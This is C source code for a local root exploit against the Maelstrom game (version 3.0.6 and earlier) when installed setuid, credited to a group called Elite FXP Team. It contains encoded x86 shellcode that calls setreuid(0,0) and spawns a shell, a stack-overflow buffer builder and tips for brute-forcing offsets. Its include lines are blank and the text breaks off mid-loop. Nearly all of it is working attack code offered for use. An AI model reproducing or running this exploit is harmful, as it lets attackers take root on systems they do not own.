/*****************************************************************
*Maelstrom <=3.0.6 exploit written by r-code from Elite FXP Team *
* dedicated to our TEAM ;] *
* Usually Maelstrom isn't +s (setuid), but many ppl set this attribute *
* enjoy! *
*****************************************************************/
#include
#include
#include
/*
 * Return the current stack pointer. x86-32 only: the asm copies %esp into
 * %eax and the function then falls off the end with no return statement,
 * relying on %eax being the i386 return register. Reaching the end of a
 * non-void function and using the result is undefined behaviour in C, so
 * this depends on the compiler/optimisation level and is not portable.
 */
unsigned long int get_sp(void) {
__asm__("movl %esp,%eax");
}
/* nothing special, prints some text :], setreuid(0,0) and runs a shell */
/*
 * Opaque x86-32 byte payload, kept verbatim. Per the author's comment above
 * it calls setreuid(0,0) and spawns a shell; the short leading sequence
 * looks like a self-decoding stub with the remainder XOR-encoded (note the
 * absence of 0x00 bytes), which is why a plain byte-pattern search for the
 * usual syscall sequences will not match it -- inferred from the bytes,
 * not verified by execution. Being a string literal, the array carries an
 * implicit trailing NUL beyond the bytes listed.
 */
unsigned char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\xe0\x80\x36\x01\x46\xe2\xfa"
"\xea\x7e\x2e\x63\x68\x6f\x2e\x72\x69\x01\x91\x91\x91\x91\x91\x91"
"\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x5a\x2a\x5c"
"\x21\x52\x69\x64\x6d\x6d\x21\x52\x71\x60\x76\x6f\x64\x65\x20\x0b\x5a\x2a\x5c"
"\x21\x46\x73\x64\x64\x75\x7b\x21\x75\x6e\x3b\x21\x62\x7b\x60\x73\x6f\x78\x2d"
"\x7d\x72\x75\x60\x62\x69\x74\x7d\x2d\x7b\x60\x6c\x68\x2d\x73\x60\x7b\x6e\x73"
"\x2d\x62\x78\x71\x69\x64\x73\x2d\x6b\x64\x65\x6d\x68\x6a\x0b\x5a\x2c\x5c\x21"
"\x47\x74\x62\x6a\x3b\x21\x44\x6d\x72\x68\x4d\x60\x52\x6e\x67\x20\x0b\x01\x80"
"\xed\x66\x2a\x01\x01\x91\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01"
"\x01\x5a\x80\xc2\x8b\x10\x01\x01\xc6\x44\xfd\x01\x01\x01\x01\x8c\x82\xe3\xec"
"\xfe\xfe\x88\x44\xf5\x88\x44\xf9\x8c\x8a\x01\xef\xfe\xfe\x30\xfe\xbb\x61\x01"
"\x01\x01\xb9\x05\x01\x01\x01\x88\xff\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a"
"\x01\x01\x01\x8a\x74\xf5\x88\xfb\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\xc8\xc2";
#define LEN 8172
#define DEFAULT_OFFSET 3800
#define ALIGN 3
#define PATH "/usr/bin/Maelstrom"
int main(int argc,char **argv) {
register int i;
char *evilstr=0,*str=0;
unsigned long int retaddr=0,offset=DEFAULT_OFFSET,*ptr=0;
printf(":: Maelstrom exploit by r-code d_fence@gmx.net ::\n");
printf(":: -=<[Elite FXP Team]>=- ::\n\n");
if(argc>1)
offset=atoi(argv[1]);
retaddr=get_sp() - offset;
printf("[+] ESP: 0x%x\n",get_sp());
printf("[+] OFFSET 0x%x, RET_ADDR: 0x%x\n",offset,retaddr);
printf("[+] If doesn't work try: \"%s 3500-4200\" in 150 steps\n",argv[0]);
evilstr=(char *)malloc(LEN);
evilstr+=ALIGN; /* Because of the evilstr[0x00]='2',evilstr[0x01]='@' */
ptr=(unsigned long int *)evilstr;
for(i=0;i<(LEN/4);i++)
*(ptr++)=(unsigned long int)retaddr;
evilstr-=ALIGN; /* Rerturning to the previous pointer adress */
memset(evilstr,'A',(LEN/2));
evilstr[0x00]='2';
evilstr[0x01]='@';
for(i=0;i |